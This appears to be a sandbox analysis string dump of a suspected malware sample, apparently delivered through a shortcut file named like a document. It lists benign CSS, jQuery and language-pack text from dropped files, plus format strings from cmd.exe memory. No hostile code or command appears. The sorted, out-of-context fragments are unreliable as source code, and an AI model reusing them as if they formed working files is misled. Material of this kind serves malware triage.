Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li.asHover li ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li.asHover ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li:hover li ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover > ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover li ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover > ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover li ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul > li.deeper > a:after

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li a:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li span:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.active > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.active > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.asHover > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.asHover > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.firstItem

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul ul

Ansi based on Dropped File (ext.default.css)

$('.adminButtonTop').hide();

Ansi based on Dropped File (unternehmen.jsp)

$('.content_inner').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheader ul li').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdown img').replaceWith('<img src="images/button-right.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdown').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdownalone img').replaceWith('<img src="images/button-right.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdownalone').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderedit').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderup img').replaceWith('<img src="images/button-left.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderup').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderupalone img').replaceWith('<img src="images/button-left.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderupalone').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenudown img').replaceWith('<img src="images/button-down.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenudownalone img').replaceWith('<img src="images/button-down.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuup img').replaceWith('<img src="images/button-up.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuupalone img').replaceWith('<img src="images/button-up.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.menuSelB2nd').append('<div class="menuSelB1st">');

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary .elomenu ul li').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary ul li a.elomenusel').append('<div class="menuSelB2nd">');

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary ul li a.elomenusel').wrapInner('<div class="menuSelContent">').wrapInner('<div class="menuSel2nd">').wrapInner('<div class="menuSel1st">');

Ansi based on Dropped File (unternehmen.jsp)

$(document).ready(function () {

Ansi based on Dropped File (unternehmen.jsp)

$(this).find(' > a').show();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.adminButtonTop').show();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenudown').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenudownalone').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuedit').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuup').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuupalone').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).mouseleave(function () {

Ansi based on Dropped File (unternehmen.jsp)

%02d%s%02d%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%02d%s%02d%s%02d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%04X-%04X

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%2d%s%02d%s%02d%s%02d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%d.%d.%04d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%ls=%ls

Ansi based on Dropped File (Roaming.exE.1622950302)

%s %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s %s%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s (%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s=%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

%SystemRoot%\System32\shell32.dll

Ansi based on Memory/File Scan (inv2.doc.lnk.bin)

%u.%u%s%s

Unicode based on Dropped File (Roaming.exE.1622950302)

%WINDOWS_COPYRIGHT%

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%x %c

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

&()[]{}^=;!%'+,`~

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

(%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

()|&=,;"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

(xL

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

)|^&=,

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

*** Unknown type: %x

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

*?|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

Ansi based on Dropped File (lang-en.js)

*Datanavigator is a web application development tool by Frank van den Heuvel.

Ansi based on Dropped File (lang-en.js)

-moz-border-radius-bottomleft: 5px;

Ansi based on Dropped File (ext.default.css)

-moz-border-radius-bottomright: 5px;

Ansi based on Dropped File (ext.default.css)

-moz-border-radius: 0px;

Ansi based on Dropped File (ext.default.css)

-moz-border-radius: 5px;

Ansi based on Dropped File (ext.default.css)

-ms-filter: "FlipH";

Ansi based on Dropped File (ie179663103.css)

-webkit-border-bottom-left-radius: 5px;

Ansi based on Dropped File (ext.default.css)

-webkit-border-bottom-right-radius: 5px;

Ansi based on Dropped File (ext.default.css)

-webkit-border-radius: 0px;

Ansi based on Dropped File (ext.default.css)

-webkit-border-radius: 5px;

Ansi based on Dropped File (ext.default.css)

.%u%s%s

Unicode based on Dropped File (Roaming.exE.1622950302)

... %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

... breadcrumb was here -->

Ansi based on Dropped File (unternehmen.jsp)

... End Visual Website Optimizer Asynchronous Code -->

Ansi based on Dropped File (unternehmen.jsp)

... etracker tracklet 4.0 -->

Ansi based on Dropped File (unternehmen.jsp)

... Start Visual Website Optimizer Asynchronous Code -->

Ansi based on Dropped File (unternehmen.jsp)

... This material may not be reproduced, displayed, modified or distributed -->

Ansi based on Dropped File (unternehmen.jsp)

... without the express prior written permission of the copyright holder. -->

Ansi based on Dropped File (unternehmen.jsp)

...- Do not copy to public page! -->

Ansi based on Dropped File (unternehmen.jsp)

...[if IE]><style type="text/css">@import url(css/design-ie.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 7]><script type="text/javascript" src="unitpngfix.js"></script><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 7]><style type="text/css">@import url(styles/content_ie6.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 8]><style type="text/css">@import url(styles/content_ie7.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

.7601.17514 (win7sp1_rtm.101119-1850)

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

.attachment-meta a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.attachment-meta:before:hover,

Ansi based on Dropped File (ie179663103.css)

.bypostauthor > .comment-body .fn:before:hover {

Ansi based on Dropped File (ie179663103.css)

.categories-links a:first-child:before:hover,

Ansi based on Dropped File (ie179663103.css)

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.comment {

Ansi based on Dropped File (ie179663103.css)

.comment-awaiting-moderation:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comment-content,

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-2 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-3 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-4 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-5 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-meta {

Ansi based on Dropped File (ie179663103.css)

.comment-meta,

Ansi based on Dropped File (ie179663103.css)

.comment-reply-link:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comment-reply-title small a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comments-link a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.date a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.DEFAULT\Control Panel\International

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

.depth-2 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-2 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-3 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-3 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-4 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-4 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-5 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-5 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.edit-link > a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.entry-meta .author a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.format-audio .entry-content:before:hover,

Ansi based on Dropped File (ie179663103.css)

.format-image .entry-content .size-full {

Ansi based on Dropped File (ie179663103.css)

.gallery img {

Ansi based on Dropped File (ie179663103.css)

.gallery-caption {

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-1 .gallery-item,

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-2 .gallery-item,

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-3 .gallery-item {

Ansi based on Dropped File (ie179663103.css)

.gallery-item:hover .gallery-caption {

Ansi based on Dropped File (ie179663103.css)

.genericon:before:hover,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-list,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-reply-title,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-respond .comment-form {

Ansi based on Dropped File (ie179663103.css)

.ie7 .comments-title,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-header,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-summary,

Ansi based on Dropped File (ie179663103.css)

.ie7 .format-status .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .format-status .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .main-navigation {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu .children {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu .sub-menu,

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu li a,

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu li {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu ul li:hover > ul {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu ul {

Ansi based on Dropped File (ie179663103.css)

.ie7 .paging-navigation .meta-nav {

Ansi based on Dropped File (ie179663103.css)

.ie7 .screen-reader-text {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .format-status .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .format-status .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .paging-navigation .nav-links {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .post-navigation .nav-links,

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-footer .widget-area {

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header .search-form [type="search"],

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header .search-form [type="text"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header {

Ansi based on Dropped File (ie179663103.css)

.ie7 audio,

Ansi based on Dropped File (ie179663103.css)

.ie7 button,

Ansi based on Dropped File (ie179663103.css)

.ie7 canvas,

Ansi based on Dropped File (ie179663103.css)

.ie7 input,

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="button"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="checkbox"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="radio"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="reset"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="submit"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 legend {

Ansi based on Dropped File (ie179663103.css)

.ie7 select,

Ansi based on Dropped File (ie179663103.css)

.ie7 textarea {

Ansi based on Dropped File (ie179663103.css)

.ie7 ul.nav-menu li:hover > ul,

Ansi based on Dropped File (ie179663103.css)

.ie7 video {

Ansi based on Dropped File (ie179663103.css)

.ie8 .author-info {

Ansi based on Dropped File (ie179663103.css)

.ie8 .format-status .entry-content:before,

Ansi based on Dropped File (ie179663103.css)

.ie8 .format-status .entry-meta:before {

Ansi based on Dropped File (ie179663103.css)

.ie8 .paging-navigation .nav-next {

Ansi based on Dropped File (ie179663103.css)

.ie8 .paging-navigation .nav-previous .meta-nav {

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-header,

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-summary,

Ansi based on Dropped File (ie179663103.css)

.ie8 .site {

Ansi based on Dropped File (ie179663103.css)

.ie8 .site-main .widget-area {

Ansi based on Dropped File (ie179663103.css)

.ie8 img.size-full,

Ansi based on Dropped File (ie179663103.css)

.ie8 img.size-large {

Ansi based on Dropped File (ie179663103.css)

.menu-toggle:after:hover,

Ansi based on Dropped File (ie179663103.css)

.nav-menu .children ul {

Ansi based on Dropped File (ie179663103.css)

.nav-menu .sub-menu ul,

Ansi based on Dropped File (ie179663103.css)

.navigation

Ansi based on Dropped File (ext.default.css)

.ndata

Ansi based on Dropped File (Roaming.exE.1622950302)

.reloc

Ansi based on Dropped File (System.dll.469766707)

.rsrc

Ansi based on Dropped File (Roaming.exE.1622950302)

.rtl .comment-reply-link:before,

Ansi based on Dropped File (ie179663103.css)

.rtl .comment-reply-login:before {

Ansi based on Dropped File (ie179663103.css)

.rtl .format-audio .entry-content:before,

Ansi based on Dropped File (ie179663103.css)

.select-menu

Ansi based on Dropped File (ext.default.css)

.site {

Ansi based on Dropped File (ie179663103.css)

.site-footer .widget {

Ansi based on Dropped File (ie179663103.css)

.site-header .home-link {

Ansi based on Dropped File (ie179663103.css)

.site-header .search-form [type="search"],

Ansi based on Dropped File (ie179663103.css)

.site-header .search-form [type="text"] {

Ansi based on Dropped File (ie179663103.css)

.site-main .sidebar-inner {

Ansi based on Dropped File (ie179663103.css)

.site-main .widget-area {

Ansi based on Dropped File (ie179663103.css)

.tags-links a:first-child:before:hover,

Ansi based on Dropped File (ie179663103.css)

.text

Ansi based on Dropped File (Roaming.exE.1622950302)

.widget {

Ansi based on Dropped File (ie179663103.css)

/* Designed by 'AS Designing'

Ansi based on Dropped File (ext.default.css)

/* License: GNU/GPL

Ansi based on Dropped File (ext.default.css)

/* Web: http://www.asdesigning.com

Ansi based on Dropped File (ext.default.css)

/* Web: http://www.astemplates.com

Ansi based on Dropped File (ext.default.css)

/* Internet Explorer 7 */

Ansi based on Dropped File (ie179663103.css)

/* Internet Explorer 8 */

Ansi based on Dropped File (ie179663103.css)

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

Ansi based on Runtime Data (exE )

/* Plugin for Cycle2; Copyright (c) 2012 M. Alsup; v20130721 */(function(e){"use strict";e.fn.cycle.transitions.tileSlide=e.fn.cycle.transitions.tileBlind={before:function(t,i,n,s){t.API.stackSlides(i,n,s),e(i).show(),t.container.css("overflow","hidden"),t.tileDelay=t.tileDelay||"tileSlide"==t.fx?100:125,t.tileCount=t.tileCount||7,t.tileVertical=t.tileVertical!==!1,t.container.data("cycleTileInitialized")||(t.container.on("cycle-destroyed",e.proxy(this.onDestroy,t.API)),t.container.data("cycleTileInitialized",!0))},transition:function(t,i,n,s,o){function r(e){p.eq(e).animate(I,{duration:t.speed,easing:t.easing,complete:function(){(s?v-1===e:0===e)&&t._tileAniCallback()}}),setTimeout(function(){(s?v-1!==e:0!==e)&&r(s?e+1:e-1)},t.tileDelay)}t.slides.not(i).not(n).hide();var c,l,a,d,u,p=e(),f=e(i),y=e(n),v=t.tileCount,h=t.tileVertical,g=t.container.height(),m=t.container.width();h?(l=Math.floor(m/v),d=m-l*(v-1),a=u=g):(l=d=m,a=Math.floor(g/v),u=g-a*(v-1)),t.container.find(".cycle-tiles-container").remove();var I,A={left:0,top:0,overflow:"hidden",position:"absolute",margin:0,padding:0};I=h?"tileSlide"==t.fx?{top:g}:{width:0}:"tileSlide"==t.fx?{left:m}:{height:0};var S=e('<div class="cycle-tiles-container"></div>');S.css({zIndex:f.css("z-index"),overflow:"visible",position:"absolute",top:0,left:0,direction:"ltr"}),S.insertBefore(n);for(var x=0;v>x;x++)c=e("<div></div>").css(A).css({width:v-1===x?d:l,height:v-1===x?u:a,marginLeft:h?x*l:0,marginTop:h?0:x*a}).append(f.clone().css({position:"relative",maxWidth:"none",width:f.width(),margin:0,padding:0,marginLeft:h?-(x*l):0,marginTop:h?0:-(x*a)})),p=p.add(c);S.append(p),f.hide(),y.show().css("opacity",1),r(s?0:v-1),t._tileAniCallback=function(){y.show(),f.hide(),S.remove(),o()}},stopTransition:function(e){e.container.find("*").stop(!0,!0),e._tileAniCallback&&e._tileAniCallback()},onDestroy:function(){var e=this.opts();e.container.find(".cycle-tiles-container").remove()}}})(jQuery);

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

/* RTL for Internet Explorer 7 & 8 */

Ansi based on Dropped File (ie179663103.css)

/** *Datanavigator is a web application development tool by Frank van den Heuvel. *Copyright

Ansi based on Runtime Data (exE )

/** *Datanavigator is a web application development tool by Frank van den Heuvel. *Copyright 2002 - 2014. All rights reserved. *//*US English is the default language pack for DataNavigator2*/DataNavigator_LANG.update({JS_CancelChanges: 'Your data has changed. Are you sure you do not want to save them?',JS_ConfirmErase: 'Erase this record?',JS_InvalidInput: 'Please check input of marked fields! Cannot save while input is invalid!',JS_SaveChanges: 'Do you want to save changed data?',JS_SaveIncChildForm: 'Save changed data in subforms or cancel operation?',JS_SaveRecord: 'Save this record?',JS_WaitUntilFinished: 'Please wait until current submit finishes!'});

Ansi based on Dropped File (lang-en.js)

/*******************************************************************************************/

Ansi based on Dropped File (ext.default.css)

Ansi based on Runtime Data (exE )

/*******************************************************************************************//*/* Designed by 'AS Designing'/* Web: http://www.asdesigning.com/* Web: http://www.astemplates.com/* License: GNU/GPL/*/*******************************************************************************************/.navigation{z-index: 50 !important;}#as-menu{background-color: #e9e9e9;background-image: -moz-linear-gradient(top, #f1f1f1, #dddddd);background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f1f1f1), to(#dddddd));background-image: -webkit-linear-gradient(top, #f1f1f1, #dddddd);background-image: -o-linear-gradient(top, #f1f1f1, #dddddd);background-image: linear-gradient(to bottom, #f1f1f1, #dddddd);background-repeat: repeat-x;border-radius: 5px;position: relative;min-height: 74px;}#as-menu .as-menu,#as-menu .as-menu *{margin: 0;padding: 0;list-style: none;}#as-menu ul.as-menu{position: relative;z-index: 150;line-height: 1.0;}#as-menu ul.as-menu a{display: block;position: relative;}#as-menu ul.as-menu li:hover{visibility: inherit;}#as-menu ul.as-menu li{float: left;position: relative;}#as-menu ul.as-menu > li,#as-menu ul.as-menu > li:hover{padding: 0;margin: 0;width: 16.66%;text-align: center;background: url('../images/li.bg.png') left top no-repeat;list-style:none;}#as-menu ul.as-menu > li.active > a,#as-menu ul.as-menu > li.asHover > a,#as-menu ul.as-menu > li.current > a,#as-menu ul.as-menu > li.active > span,#as-menu ul.as-menu > li.asHover > span,#as-menu ul.as-menu > li.current > span{background: none;color: #E08034;}#as-menu ul.as-menu > li.firstItem,#as-menu ul.as-menu > li:first-child{background: none repeat scroll 0 0 transparent}#as-menu ul.as-menu > li > a,#as-menu ul.as-menu > li > span{font-size: 18px;line-height: 20px;font-family: 'BenchNine', sans-serif;color: #464646;background: none;height: 20px;display: block;font-weight: 400;padding: 27px 1em;text-transform: uppercase;}#as-menu ul.as-menu > li > a:hover,#as-menu ul.as-menu > li > span:hover{background: none;color: #E08034;}#as-menu ul.as-menu > li > a:hover > span,#as-menu ul.as-menu > li > span:hover > span{background-position: center bottom !important;}#as-menu ul.as-menu > li.deeper > a{position: relative;}#as-menu ul.as-menu > li.deeper > a:after{display: inline-block;background: url('../images/dd.arrow.png') left top no-repeat;width: 7px;height: 5px;position: relative;left: 12px;top: -4px;content: "";}#as-menu ul.as-menu li:hover > ul,#as-menu ul.as-menu li.asHover > ul{top: 75px;}#as-menu ul.as-menu ul{width: 191px;display: none;}#as-menu ul.as-menu ul{position: absolute;background-color: #e9e9e9;background-image: -moz-linear-gradient(top, #f1f1f1, #dddddd);background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f1f1f1), to(#dddddd));background-image: -webkit-linear-gradient(top, #f1f1f1, #dddddd);background-image: -o-linear-gradient(top, #f1f1f1, #dddddd);background-image: linear-gradient(to bottom, #f1f1f1, #dddddd);background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff1f1f1', endColorstr='#ffdddddd', GradientType=0);padding: 12px 0;-webkit-border-radius: 0px;-moz-border-radius: 0px;border-radius: 0px;-webkit-border-bottom-right-radius: 5px;-moz-border-radius-bottomright: 5px;border-bottom-right-radius: 5px;-webkit-border-bottom-left-radius: 5px;-moz-border-radius-bottomleft: 5px;border-bottom-left-radius: 5px;}#as-menu ul.as-menu li:hover ul,#as-menu ul.as-menu li.asHover ul{left: 0;top: 75px;z-index: 100;}#as-menu ul.as-menu li:hover li ul,#as-menu ul.as-menu li.asHover li ul{top: -999em;}#as-menu ul.as-menu ul li{width: 100%;margin: 0 0 1px 0;list-style: none;}#as-menu ul.as-menu ul > li.deeper > a:after{display: inline-block;background: url('../images/ddr.arrow.png') left top no-repeat;width: 5px;height: 7px;position: relative;left: 15px;top: -2px;content: "";}#as-menu ul.as-menu ul ul{background-image: linear-gradient(to bottom, #e5e5e5, #c5c5c5);background-image: -moz-linear-gradient(top, #e5e5e5, #c5c5c5);background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e5e5e5), to(#c5c5c5));background-image: -webkit-linear-gradient(top, #e5e5e5, #c5c5c5);background-image: -o-linear-gradient(top, #e5e5e5, #c5c5c5); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe5e5e5', endColorstr='#ffc5c5c5', GradientType=0);left: 187px !important;top: 5px !important;-webkit-border-radius: 5px;-moz-border-radius: 5px;border-radius: 5px;}#as-menu ul.as-menu ul li.firstItem{border: none;}#as-menu ul.as-menu ul li a,#as-menu ul.as-menu ul li span{text-align: center;font-size: 16px;line-height: 20px;font-family: 'BenchNine', sans-serif;color: #464646;background: none;display: block;padding: 0.5em 1em 0.3em;text-decoration: none;text-transform: uppercase;}#as-menu ul.as-menu ul li a:hover,#as-menu ul.as-menu ul li span:hover,#as-menu ul.as-menu ul li.active > a,#as-menu ul.as-menu ul li.asHover > a,#as-menu ul.as-menu ul li.active > span,#as-menu ul.as-menu ul li.asHover > span{color: #E08034;}#as-menu ul.as-menu li li:hover ul,#as-menu ul.as-menu li li.asHover ul{left: 10em;top: 0;}#as-menu ul.as-menu li li:hover li ul,#as-menu ul.as-menu li li.asHover li ul{top: -999em;}#as-menu ul.as-menu li li:hover ul,#as-menu ul.as-menu li li.asHover ul{top: -1em;left: 191px;}#as-menu ul.as-menu li li li:hover ul,#as-menu ul.as-menu li li li.asHover ul{top: -1em;left: 191px;}@media (min-width: 768px) {.select-menu{display: none;}}@media (max-width: 767px) {#as-menu{min-height: auto;}.select-menu{display: block;width: 100%;}#as-menu .as-menu{display: none;}}

Ansi based on Dropped File (ext.default.css)

Ansi based on Runtime Data (exE )

/*Styles for older IE versions (previous to IE9).*/.site {min-width: 1040px;}.genericon:before:hover,.menu-toggle:after:hover,.date a:before:hover,.entry-meta .author a:before:hover,.format-audio .entry-content:before:hover,.comments-link a:before:hover,.tags-links a:first-child:before:hover,.categories-links a:first-child:before:hover,.edit-link > a:before:hover,.attachment-meta:before:hover,.attachment-meta a:before:hover,.comment-awaiting-moderation:before:hover,.comment-reply-link:before:hover,.comment-reply-title small a:before:hover,.bypostauthor > .comment-body .fn:before:hover {text-decoration: none;}.nav-menu .sub-menu ul,.nav-menu .children ul {left: 100%;}.site-header .home-link {max-width: 1040px;}.site-header .search-form [type="search"],.site-header .search-form [type="text"] {padding-top: 6px;}img.alignright {margin-right: 0;}img.alignleft {margin-left: 0;}.site-main .sidebar-inner {width: 1040px;}.site-main .widget-area {margin-right: 60px;}.format-image .entry-content .size-full {margin: 0;max-width: 604px;}.gallery-columns-1 .gallery-item,.gallery-columns-2 .gallery-item,.gallery-columns-3 .gallery-item {max-width: none;}.gallery img {width: auto;}.gallery-caption {background: #000;filter: alpha(opacity=0);}.gallery-item:hover .gallery-caption {filter: alpha(opacity=70);}.comment {clear: both;}.comment-meta,.comment-content,.comment-list .reply {width: 480px;}.depth-2 .comment-meta,.depth-2 .comment-content,.comment-list .depth-2 .reply {width: 460px;}.depth-3 .comment-meta,.depth-3 .comment-content,.comment-list .depth-3 .reply {width: 440px;}.depth-4 .comment-meta,.depth-4 .comment-content,.comment-list .depth-4 .reply {width: 420px;}.depth-5 .comment-meta,.depth-5 .comment-content,.comment-list .depth-5 .reply {width: 400px;}.comment-meta {margin-bottom: 0;}.widget {background: #f7f5e7;}.site-footer .widget {background: none;}/* Internet Explorer 8 */.ie8 .site {border: 0;}.ie8 img.size-full,.ie8 img.size-large {height: auto;width: auto;}.ie8 .sidebar .entry-header,.ie8 .sidebar .entry-content,.ie8 .sidebar .entry-summary,.ie8 .sidebar .entry-meta {max-width: 724px;}.ie8 .author-info {margin-left: 0;}.ie8 .paging-navigation .nav-previous .meta-nav {padding: 5px 0 8px;width: 40px;}.ie8 .paging-navigation .nav-next {line-height: 1;}.ie8 .format-status .entry-content:before,.ie8 .format-status .entry-meta:before {content: none;}.ie8 .site-main .widget-area {margin-right: 0;}/* Internet Explorer 7 */.ie7 audio,.ie7 canvas,.ie7 video {display: inline;zoom: 1;}.ie7 legend {margin-left: -7px;}.ie7 button,.ie7 input,.ie7 